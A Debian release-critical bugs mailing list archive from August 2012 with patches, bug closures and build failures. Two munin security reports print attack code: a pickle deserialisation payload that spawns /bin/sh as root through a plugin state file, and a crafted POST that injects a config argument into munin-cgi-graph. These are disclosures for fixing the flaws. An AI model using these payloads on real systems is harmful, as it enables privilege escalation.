--- doxygen-1.8.1.1/debian/patches/fix_676423_segfault.patch1970-01-01 
01:00:00.0 +0100
+++ doxygen-1.8.1.1/debian/patches/fix_676423_segfault.patch2012-07-05 
17:52:45.0 +0200
@@ -0,0 +1,23 @@
+Description: fix for 676423: new segmentation faults in version 1.8.1-1
+ removeEmptyLines() segfaults on empty string
+Author: Thibaut Paumard paum...@users.sourceforge.net
+Origin: vendor
+Bug-Debian: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=676423
+Forwarded: no
+Last-Update: 2012-07-05
+---
+This patch header follows DEP-3: http://dep.debian.net/deps/dep3/
+--- a/src/htmlgen.cpp
 b/src/htmlgen.cpp
+@@ -936,6 +936,11 @@
+ static QCString removeEmptyLines(const QCString s)
+ {
+   BufStr out(s.length()+1);
++  if (s.length()==0)
++  {
++out.addChar('\0');
++return out.data();
++  }
+   char *p=s.data();
+   char c;
+   while ((c=*p++))
diff -Nru doxygen-1.8.1.1/debian/patches/series 
doxygen-1.8.1.1/debian/patches/series
--- doxygen-1.8.1.1/debian/patches/series   2011-12-12 15:57:06.0 
+0100
+++ doxygen-1.8.1.1/debian/patches/series   2012-07-05 17:48:23.0 
+0200
@@ -5,3 +5,4 @@
 gcc-g.diff
 doxygen-jquery.patch
 #dot_num_threads.diff
+fix_676423_segfault.patch


signature.asc
Description: OpenPGP digital signature


Processed: tagging 680418

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 680418 + moreinfo
Bug #680418 [gvfs-fuse] gvfs-fuse: Wrongly sucessful posix fwrite call on a 
gvfs sftp mount can lead to data loss
Added tag(s) moreinfo.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
680418: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680418
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#681962: marked as done (libgtk2.0-0: removes files that were installed by another package: /etc/gtk-2.0/im-multipress.conf)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 17:02:32 +
with message-id e1syqhm-0007yl...@franck.debian.org
and subject line Bug#681962: fixed in gtk+2.0 2.24.10-2
has caused the Debian Bug report #681962,
regarding libgtk2.0-0: removes files that were installed by another package: 
/etc/gtk-2.0/im-multipress.conf
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
681962: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=681962
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libgtk2.0-0
Version: 2.24.10-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package removes files that
were installed by another package.
The removed files were already present before the package was installed,
they may have been shipped or created by a dependency.

This could be a violation of policy 10.7.4 (Sharing configuration
files), see
http://www.debian.org/doc/debian-policy/ch-files.html#s10.7.4
or policy chapter 6 (Package maintainer scripts...), see
http://www.debian.org/doc/debian-policy/ch-maintainerscripts.html
or policy 7.6 (Overwriting files...), see
http://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

If a directory is used by several packages, all should ship it as part
of the package (possibly empty, using $package.dirs to create it), and
no package should mkdir/rmdir it in the maintainer scripts as dpkg will
take care of this.

From the attached log (scroll to the bottom...):

0m23.1s ERROR: FAIL: After purging files have disappeared:
  /etc/gtk-2.0/  owned by: libgtk2.0-common
  /etc/gtk-2.0/im-multipress.confowned by: libgtk2.0-common


cheers,

Andreas


libgtk2.0-0_2.24.10-1.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: gtk+2.0
Source-Version: 2.24.10-2

We believe that the bug you reported is fixed in the latest version of
gtk+2.0, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 681...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michael Biebl bi...@debian.org (supplier of updated gtk+2.0 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 06 Aug 2012 17:55:03 +0200
Source: gtk+2.0
Binary: libgtk2.0-0 libgtk2.0-0-udeb libgtk2.0-common libgtk2.0-bin 
libgtk2.0-dev libgtk2.0-0-dbg libgtk2.0-doc gtk2.0-examples gtk2-engines-pixbuf 
gir1.2-gtk-2.0 libgail18 libgail-common libgail-dev libgail-dbg libgail-doc
Architecture: source all amd64
Version: 2.24.10-2
Distribution: unstable
Urgency: low
Maintainer: Debian GNOME Maintainers 
pkg-gnome-maintain...@lists.alioth.debian.org
Changed-By: Michael Biebl bi...@debian.org
Description: 
 gir1.2-gtk-2.0 - GTK+ graphical user interface library -- gir bindings
 gtk2-engines-pixbuf - pixbuf-based theme for GTK+ 2.x
 gtk2.0-examples - example files for GTK+ 2.0
 libgail-common - GNOME Accessibility Implementation Library -- common modules
 libgail-dbg - Gail libraries and debugging symbols
 libgail-dev - GNOME Accessibility Implementation Library -- development files
 libgail-doc - documentation files of the Gail library
 libgail18  - GNOME Accessibility Implementation Library -- shared libraries
 libgtk2.0-0 - GTK+ graphical user interface library
 libgtk2.0-0-dbg - GTK+ libraries and debugging symbols
 libgtk2.0-0-udeb - GTK+ graphical user interface library - minimal runtime 
(udeb)
 libgtk2.0-bin - programs for the GTK+ graphical user interface library
 libgtk2.0-common - common files for the GTK+ graphical user interface library
 libgtk2.0-dev - development files for the GTK+ library
 libgtk2.0-doc - documentation for the GTK+ graphical user interface library
Closes: 681962 683912
Changes: 
 gtk+2.0 (2.24.10-2) unstable; urgency=low
 .
   [ Josselin Mouette ]
   * Update epoch on libxrandr dependencies.
 .
   [ Ansgar Burchardt ]
   * debian/rules: Use xz compression for binary packages. Closes: #683912
 .
   [ Michael Biebl ]
   * debian/libgtk2.0-0.postrm.in: Drop rm -rf /etc/gtk-2.0 on purge since
 this removes files owned by libgtk2.0-common. The generated cache files
 for gdk pixbuf loaders and gtk input method 

Bug#674556: #674556 gtk-recordmydesktop: hides main menubar in gnome3 making desktop unusable

2012-08-06 Thread gregor herrmann
On Wed, 04 Jul 2012 19:16:34 +0300, Timo Juhani Lindfors wrote:

 I too can still reproduce this bug. It makes the package completely
 unusable for its intended purpose (desktop screencasting). I'm bumping
 severity accordingly. If you know some workaround that makes it still
 possible to use the package, please let me know.

According to the PTS, Ubuntu has some patches:

https://patches.ubuntu.com/g/gtk-recordmydesktop/gtk-recordmydesktop_0.3.8-4.1ubuntu1.patch

Maybe debian/patches/selectwindow.patch or
debian/patches/compiz.patch are related?
https://bugs.launchpad.net/ubuntu/+source/gtk-recordmydesktop/+bug/534386
https://bugs.launchpad.net/ubuntu/+source/gtk-recordmydesktop/+bug/556345

(Just guessing, I don't plan to install Gnome to check it out :))

Cheers,
gregor

-- 
 .''`.  Homepage: http://info.comodo.priv.at/ - OpenPGP key 0xBB3A68018649AA06
 : :' : Debian GNU/Linux user, admin, and developer  -  http://www.debian.org/
 `. `'  Member of VIBE!AT  SPI, fellow of the Free Software Foundation Europe
   `-   NP: The Mamas  The Papas: I Saw Her Again Last Night


signature.asc
Description: Digital signature


Bug#684067: redmine postgresql backend fails in redmine clean instalation (whatever version 1.4.3, 1.4.4 or 1.4.2)

2012-08-06 Thread PICCORO McKAY Lenz
Package: redmine
Version: 1.4.4+dfsg1-1
Justification: renders package unusable
Severity: grave

When i install or upgrade redmine (whatever clen or not environment or
server debian)
with postgresql backend didint finally install and get this error:

Tasks: TOP = db:migrate = environment
(See full trace by running task with --trace)
Error when running rake db:migrate, check database configuration.
exit: 295: Illegal number: -1

i installed to clean env 1.4.3 redmine and failts with same error, but
i not have any plugin extra, and i used pgsql backend.. it faild with
others backend but sqlite not fail...

this bug are present since 1.4.3 and on some rare cisrcunstances on
1.4.2 too, its permanent and in redmine 1.4.4

this its seriously... i market grave and render package unusable due
only works if i used mysql or postgres
also works with mariadb inclusively but not using dbconfig common
with postgres..

I ATTACHED DEBIAN SYSTEM INFO FOR THE TWO CASES with postgres when
fail and for mysql that install perfectly

later i'l try install in varios king of environment and for sqlite or
mysql not fail, only postgresql backend fails, it seem to be a bad
username/password due in installation configuration do not ask for
postgresql admin's password..

my postgresql configuration permit and trust the user admindb

Complete error at instalation its:

Configuring redmine-pgsql (1.4.4+dfsg1-1) ...
Configuring redmine (1.4.4+dfsg1-1) ...
dbconfig-common: writing config to
/etc/dbconfig-common/redmine/instances/default.conf
Creating config file
/etc/dbconfig-common/redmine/instances/default.conf with new version
Creating config file /etc/redmine/default/database.yml.new with new version
creating postgres user redmine:  success.
verifying creation of user: success.
creating database redmine_default: success.
verifying database redmine_default exists: success.
dbconfig-common: flushing administrative password
Creating config file /etc/redmine/default/database.yml with new version
NOTE: Gem.source_index is deprecated, use Specification. It will be
removed on or after 2011-11-01.
Gem.source_index called from
/usr/share/redmine/config/../vendor/rails/railties/lib/rails/gem_dependency.rb:21.
Please install RDoc 2.4.2+ to generate documentation.
Creating config file /etc/redmine/default/session.yml with new version
A new secret session key has been generated in /etc/redmine/default/session.yml
Populating database for redmine instance default.
This may take a while.
NOTE: Gem.source_index is deprecated, use Specification. It will be
removed on or after 2011-11-01.
Gem.source_index called from
/usr/share/redmine/config/../vendor/rails/railties/lib/rails/gem_dependency.rb:21.
Please install RDoc 2.4.2+ to generate documentation.
rake aborted!
Tasks: TOP = db:migrate = environment
(See full trace by running task with --trace)
Error when running rake db:migrate, check database configuration.
exit: 295: Illegal number: -1
dpkg: error al procesar redmine (--configure):
 el subproceso instalado el script post-installation devolvió el
código de salida de error 2


THERE's REPORT SYSTEMWITH POSTGRESQL PACKAGE:

-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.39-bpo.2-686-pae (SMP w/2 CPU cores)
Locale: LANG=es_VE.UTF-8, LC_CTYPE=es_VE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages redmine depends on:
ii  bundler  1.1.3-1 Manage Ruby application dependenci
ii  dbconfig-common  1.8.46  common framework for packaging dat
ii  debconf [debconf-2.0 1.5.36.1Debian configuration management sy
ii  redmine-pgsql1.4.4+dfsg1-1 metapackage providing MySQL depend
ii  ruby 4.5 An interpreter of object-oriented
ii  ruby-coderay 1.0.6-1 Venenux Ruby library for syntax hi
ii  ruby-fastercsv   1.5.5-1 Complete replacement to the CSV st
ii  ruby-net-ldap0.3.1-1 LDAP client library for Ruby
ii  ruby-rack1.4.1-1 Modular Ruby webserver interface
ii  ruby-rails-2.3   2.3.14-2  MVC ruby based framework geared fo

Versions of packages redmine recommends:
ii  libopenid-ruby [ruby-o 2.1.8debian-1 Ruby library for verifying and ser
ii  ruby-rmagick   2.13.1-5ImageMagick API for Ruby (document

Versions of packages redmine suggests:
ii  subversion   1.6.18dfsg-1vnzsqe1 Advanced version control system in

  redmine/instances/default/password-confirm: (password omitted)
  redmine/instances/default/mysql/admin-pass: (password omitted)
  redmine/instances/default/app-password-confirm: (password omitted)
  redmine/instances/default/mysql/app-pass: (password omitted)
  redmine/instances/default/pgsql/admin-pass: (password omitted)
  redmine/instances/default/pgsql/app-pass: (password omitted)
  redmine/instances/default/passwords-do-not-match:
  

Bug#683767: marked as done (ppl: FTBFS on power pc: out of memory)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 17:17:41 +
with message-id e1syqw1-0008aw...@franck.debian.org
and subject line Bug#683767: fixed in ppl 0.11.2-6.2
has caused the Debian Bug report #683767,
regarding ppl: FTBFS on power pc: out of memory
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
683767: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683767
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: ppl
Version: 0.11.2-6.1
Severity: serious
Tags: patch pending
Justification: 0.11.2-6 did build on powerpc

Full build log:
https://buildd.debian.org/status/fetch.php?pkg=pplarch=powerpcver=0.11.2-6.1stamp=1343423594

Last lines:
/bin/bash ../../libtool  --tag=CXX   --mode=link powerpc-linux-gnu-g++  -g -O2 
-frounding-math -g -O2 -fstack-protector --param=ssp-buffer-size=4 -Wformat 
-Werror=format-security -Wall -g -W -Wall  -Wl,-z,relro -o exceptions1 
exceptions1.o ../../utils/libppl_utils.a ../../tests/libppl_tests.a 
../../src/libppl.la -L/usr/lib/powerpc-linux-gnu -lgmpxx 
-L/usr/lib/powerpc-linux-gnu -lgmp -R/usr/lib/powerpc-linux-gnu 
-R/usr/lib/powerpc-linux-gnu
libtool: link: powerpc-linux-gnu-g++ -g -O2 -frounding-math -g -O2 
-fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security 
-Wall -g -W -Wall -Wl,-z -Wl,relro -o .libs/exceptions1 exceptions1.o  
../../utils/libppl_utils.a ../../tests/libppl_tests.a ../../src/.libs/libppl.so 
-L/usr/lib/powerpc-linux-gnu -lgmpxx -lgmp -Wl,-rpath 
-Wl,/usr/lib/powerpc-linux-gnu
powerpc-linux-gnu-g++ -DHAVE_CONFIG_H -I. -I../..  -I../../src -I../../src 
-I../../utils -I../../tests -DNDEBUG=1   -g -O2 -frounding-math -g -O2 
-fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security 
-Wall -g -W -Wall -MT mipproblem1.o -MD -MP -MF .deps/mipproblem1.Tpo -c -o 
mipproblem1.o mipproblem1.cc
virtual memory exhausted: Cannot allocate memory

Ubuntu patch:
http://launchpadlibrarian.net/101503205/ppl_0.11.2-6ubuntu2_0.11.2-6ubuntu3.diff.gz

A NMU should follow soon.
---End Message---
---BeginMessage---
Source: ppl
Source-Version: 0.11.2-6.2

We believe that the bug you reported is fixed in the latest version of
ppl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 683...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nicolas Boulenguez nicolas.bouleng...@free.fr (supplier of updated ppl 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Fri, 03 Aug 2012 18:50:55 +0200
Source: ppl
Binary: libppl9 libppl0.11-dev libppl-c4 libpwl5 libpwl-dev libppl-doc 
libppl-swi
Architecture: source amd64 all
Version: 0.11.2-6.2
Distribution: unstable
Urgency: low
Maintainer: Debian GCC Maintainers debian-...@lists.debian.org
Changed-By: Nicolas Boulenguez nicolas.bouleng...@free.fr
Description: 
 libppl-c4  - Parma Polyhedra Library (C interface)
 libppl-doc - Parma Polyhedra Library: Documentation
 libppl-swi - Parma Polyhedra Library (SWI Prolog interface)
 libppl0.11-dev - Parma Polyhedra Library (development)
 libppl9- Parma Polyhedra Library (runtime library)
 libpwl-dev - Parma Watchdog Library (Watchdog timers - development)
 libpwl5- Parma Watchdog Library (Watchdog timers - runtime library)
Closes: 683767
Changes: 
 ppl (0.11.2-6.2) unstable; urgency=low
 .
   * Non-maintainer upload.
 .
   [ Colin Watson cjwat...@ubuntu.com ]
   * Build the test suite with -gstabs rather than -g on powerpc, to avoid
 running out of memory, see Ubuntu bug #941676 (Closes: #683767)
Checksums-Sha1: 
 f48d6fe75a65df7dd647c1627bbb4bf93a72295e 1956 ppl_0.11.2-6.2.dsc
 044f4574a2e2ef35adda11ce8a4a5e85f8409b9c 14897 ppl_0.11.2-6.2.debian.tar.gz
 b2df0a0d9ea5b9f3f9d73098caac221edc3966c9 539634 libppl9_0.11.2-6.2_amd64.deb
 0e6e5eaea71d7f05ba4e30cdbccb7f6bbe3d575d 3618368 
libppl0.11-dev_0.11.2-6.2_amd64.deb
 c94fb6cdb579a77903c1c1eabd59a841b22a4b7e 1516252 libppl-c4_0.11.2-6.2_amd64.deb
 39dda15d3bcde0f3783db71d55b356ac09e5b7eb 30350 libpwl5_0.11.2-6.2_amd64.deb
 cb74ca02ecc1377e80c7b484748256ee123d4538 40090 libpwl-dev_0.11.2-6.2_amd64.deb
 34ac134c45e3b1e5a80ed2e280c9d9f8b11ad657 5393948 
libppl-swi_0.11.2-6.2_amd64.deb
 

Bug#684067: redmine postgresql backend fails in redmine clean instalation (whatever version 1.4.3, 1.4.4 or 1.4.2)

2012-08-06 Thread Jérémy Lal
From the info you give, i cannot distinguish which problem you have :

1 - dbconfig was not able to connect to postgresql server and create
the redmine-default database. This is the probable cause of your
problem.

2 - 1) was ok, but rake db:migrate (in postinst) cannot connect to
the created database.


Regards,
Jérémy.


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#632234: marked as done (pypoker-eval: won't build modules for Python 2.7)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 17:32:36 +
with message-id e1syras-00015f...@franck.debian.org
and subject line Bug#632234: fixed in pypoker-eval 138.0-1.1
has caused the Debian Bug report #632234,
regarding pypoker-eval: won't build modules for Python 2.7
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
632234: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632234
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---

Source: pypoker-eval
Version: 138.0-1
Severity: important
User: debian-pyt...@lists.debian.org
Usertags: python2.7

I rebuilt popoker-eval against python-defaults 2.7.2-1 (currently in 
experimental). The resulting binary package python-poker2d contained 
only extension modules for Python 2.6:


$ dpkg -c python-pypoker-eval_138.0-1_i386.deb | grep -- -packages/$
drwxr-xr-x root/root 0 2011-06-30 18:48 
./usr/lib/python2.6/dist-packages/

--
Jakub Wilk


---End Message---
---BeginMessage---
Source: pypoker-eval
Source-Version: 138.0-1.1

We believe that the bug you reported is fixed in the latest version of
pypoker-eval, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 632...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastian Venthur vent...@debian.org (supplier of updated pypoker-eval package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 06 Aug 2012 19:14:46 +0200
Source: pypoker-eval
Binary: python-pypoker-eval
Architecture: source amd64
Version: 138.0-1.1
Distribution: unstable
Urgency: low
Maintainer: Loic Dachary (OuoU) l...@debian.org
Changed-By: Bastian Venthur vent...@debian.org
Description: 
 python-pypoker-eval - python interface to poker hand evaluator library 
development file
Closes: 632234
Changes: 
 pypoker-eval (138.0-1.1) unstable; urgency=low
 .
   * Non-maintainer upload.
   * Fix won't build modules for Python 2.7 Applied patch by Sebastian
 Ramacher (Closes: #632234)
Checksums-Sha1: 
 246856f2ce83449a7f3af9b6e6b1a2ba39150ed6 1852 pypoker-eval_138.0-1.1.dsc
 0509b5fbf399b61150540b7825553fa23c674574 594914 pypoker-eval_138.0-1.1.diff.gz
 915fc05d5c3d1f76636bd02a0589a854665b41bf 86858 
python-pypoker-eval_138.0-1.1_amd64.deb
Checksums-Sha256: 
 9ace437c6acbefdeddda22858ff24be3078af57c531fe60f60bba0decd44aa6e 1852 
pypoker-eval_138.0-1.1.dsc
 46a350858f4935fd662095877cb5a2cc27958510fa95aca9ad1d87a352fefbc6 594914 
pypoker-eval_138.0-1.1.diff.gz
 e57d6e32dc05784c795ca2dc501f7d033fdab498124a85fba83bfd091fd00d8f 86858 
python-pypoker-eval_138.0-1.1_amd64.deb
Files: 
 eaf7dad7a4e0dd56cf19a2190a5a2aa1 1852 libs optional pypoker-eval_138.0-1.1.dsc
 dfab13420aefc2039a00de533de60636 594914 libs optional 
pypoker-eval_138.0-1.1.diff.gz
 a37cd8f5f6733d25c62c01281590c25a 86858 python optional 
python-pypoker-eval_138.0-1.1_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIbBAEBAgAGBQJQH/xEAAoJEI6IlUTZhQANT+8P+I/sB/MbKs1Bi/LQzBEFru+c
y2ucLU2VO5sumv0NVtvQY/m6McYNibVuziMZQ20qLz0YdJWHNpKK3NnP8a7ByKdc
F0q4JdO8gmU6MubpT+vSONRG6XCxaZ4t1Oii7bUhoRWxXb5e9M5MOfHxUprNbDs7
RrZzFUGDLG9B8HPS+hFm480PIjaYooXRTGSPLix9ql6lnop7NY/J8xtM7dbbm0Bb
2dkwQh6JzGyKJr+5cxMz84I9h8itVE4/ociHQQKZuNdRQ63WJtzQZEf+Q5QyAxuU
WTitiatjlV5IJDCYN+BiK9FxEECzLrmlbbKLq7NCOavx2x8gRR7lmeJj4YfLY4Jr
/TZDMbwVuCqmzis/B5X5PiczJRytPFZUYqrAI29BXx31/fLeTFSClSffR5bnbh8F
dTiNtXqZaBz9+BFAnqFYKKm6CPoQXm9knldDwJzkhe7YnohM/jah3p3+ndUEsifo
KxeWMYGbo1F7qjeq+n+Q5VSFdFbxc9uebe0bNzrrtphgnR3xc5Khlzc8Dix6JToO
XOQjFYxq0iXajGaM6YARV4i5mqau2auJcgj+VS5RwlWVeEvTfzuVM8FP2dgB0fG+
2bsysWSmt8LrxOEAXijxrrzOdM1zrLHe5IIttg3neG/cp3EFwzdT047AwIV31dSp
cAdpKIyxb072luHucPY=
=rja2
-END PGP SIGNATUREEnd Message---


Bug#684075: Subject: munin: insecure state file handling, munin-root privilege escalation in smart_ plugin

2012-08-06 Thread Stevie Trujillo
Package: munin-plugins-core
Version: 1.4.5-3
Severity: grave
Tags: upstream security
X-Debbugs-CC: hel...@subdivi.de

Hello, copying kenyon's report from
http://www.munin-monitoring.org/ticket/1234 :



Currently, plugins which run as root mix their state files in the same
directory as non-root plugins. The state directory is owned by
munin:munin and is group-writable. Because of these facts, it is
possible for an attacker who operates as user munin to cause a
root-run plugin to run arbitrary code as root.

A proof-of-concept example is the smart_ plugin. It must run as root
to access disk SMART data. It also stores state in Python pickle
format, which can store executable Python code. Example follows:



# su -s /bin/sh -c /bin/sh munin
$ cd /var/lib/munin/plugin-state
$ mv smart-sda.state smart-sda.state.orig
$ cat bla.py
import pickle
import subprocess
import sys

class RunBinSh(object):
  def __reduce__(self):
return (subprocess.Popen, (('/bin/sh', '-c', 'id  /tmp/whoami'),))

pickle.dump(RunBinSh(), sys.stdout)
$ python bla.py  smart-sda.state
# wait for node to run smart_ plugin
$ cat /tmp/whoami
uid=0(root) gid=110(munin) groups=0(root),110(munin)



A possible solution is to have a directory dedicated to each plugin,
especially plugins which may run with superuser privileges, so that
less-privileged users cannot modify their state files. This cannot be
enforced by munin on all plugins, but this can be enforced by munin
developers for plugins shipped with the munin package. We should
consider making it easy for plugin writers to do this, maybe by making
the perl/bourne shell/other language munin plugin API use a dedicated
plugin state directory for each plugin. Otherwise, a plugin could be
hardcoded to create and use a subdirectory of the existing
plugin-state directory.

Thanks to cnu on the munin IRC channel for raising this issue and
providing the smart_ example.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684076: munin-cgi-graph: User can load new config, pointing log to arbitrary file

2012-08-06 Thread Stevie Trujillo
Package: munin
Version: 2.0.1-1
Severity: grave
Tags: security
X-Debbugs-CC: hel...@subdivi.de

http://www.munin-monitoring.org/ticket/1238

When running munin-cgi-graph as a CGI-script (not FastCGI) under Apache2,
Apache2 may use the query-string as command line arguments.

This will write 2012/07/04 18:03:57 Opened log file to /tmp/123.txt
(this didn't work for helmut, but ?--help also demonstrated the
problem):

my $data = logdir /tmp/123.txt\0\n;
print POST /cgi-bin/munin-cgi-graph/x.png?--config+/dev/stdin HTTP/1.1\r\n .
  Host: 127.0.0.1\r\n .
  Connection: close\r\n .
  Content-Length: .length($data).\r\n .
  \r\n .
  $data;


munin will check the query-string for bad characters after opening the
log file and terminate, limiting the possible damage.

munin will also try opening $conf.storable using perl's Storable
module. I'm not sure if this can be used to provide code execution
like python's pickle.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): your mail

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 retitle 684075 munin: insecure state file handling, munin-root
Bug #684075 [munin-plugins-core] Subject: munin: insecure state file handling, 
munin-root privilege escalation in smart_ plugin
Changed Bug title to 'munin: insecure state file handling, munin-root' from 
'Subject: munin: insecure state file handling, munin-root privilege escalation 
in smart_ plugin'
 privilege escalation in smart_ plugin

End of message, stopping processing here.

Please contact me if you need assistance.
-- 
684075: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684075
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): cloning 684004

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 clone 684004 -1
Bug #684004 [calligra] calligra: Buffer overflow
Bug 684004 cloned as bug 684078
 -1 tags - pending
 reassign -1 wv2
Bug #684078 [calligra] calligra: Buffer overflow
Bug reassigned from package 'calligra' to 'wv2'.
Ignoring request to alter found versions of bug #684078 to the same values 
previously set
Ignoring request to alter fixed versions of bug #684078 to the same values 
previously set
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
684004: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684004
684078: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684078
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 684078

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 684078 = upstream
Bug #684078 [wv2] calligra: Buffer overflow
Removed tag(s) security, fixed-upstream, and pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
684078: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684078
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684078: Calligra fix doesn't work for wv2

2012-08-06 Thread Scott Kitterman
I tried applying the patch calligra used to wv2 and it failed to build:

[ 47%] Building CXX object src/CMakeFiles/wv2.dir/styles.cpp.o
cd /tmp/buildd/wv2-0.4.2.dfsg.1/obj-i486-linux-gnu/src  /usr/lib/ccache/c++   
-Dwv2_EXPORTS -DHAVE_CONFIG_H -g -O2 -fstack-protector --param=ssp-buffer-
size=4 -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2 -DNDEBUG -fPIC -
I/usr/include/glib-2.0 -I/usr/lib/i386-linux-gnu/glib-2.0/include -
I/usr/include/libgsf-1 -I/tmp/buildd/wv2-0.4.2.dfsg.1/src -
I/tmp/buildd/wv2-0.4.2.dfsg.1/obj-i486-linux-gnu-o 
CMakeFiles/wv2.dir/styles.cpp.o -c /tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:242:2: warning: #warning Couldn't 
generate writing code for STD::xstzName [-Wcpp]
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:246:2: warning: #warning Couldn't 
generate writing code for STD::grupx [-Wcpp]
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp: In member function 'void 
wvWare::Word97::STD::readStyleName(wvWare::U16, wvWare::OLEStreamReader*)':
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:281:13: error: 'offset' was not 
declared in this scope
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:281:22: error: 'cbUPX' was not 
declared in this scope
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:282:62: error: 'endl' was not 
declared in this scope
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:282:62: note: suggested 
alternative:
In file included from /usr/include/c++/4.7/iostream:40:0,
 from /tmp/buildd/wv2-0.4.2.dfsg.1/src/wvlog.h:22,
 from /tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:25:
/usr/include/c++/4.7/ostream:562:5: note:   'std::endl'
/tmp/buildd/wv2-0.4.2.dfsg.1/src/styles.cpp:283:20: error: return-statement 
with a value, in function returning 'void' [-fpermissive]
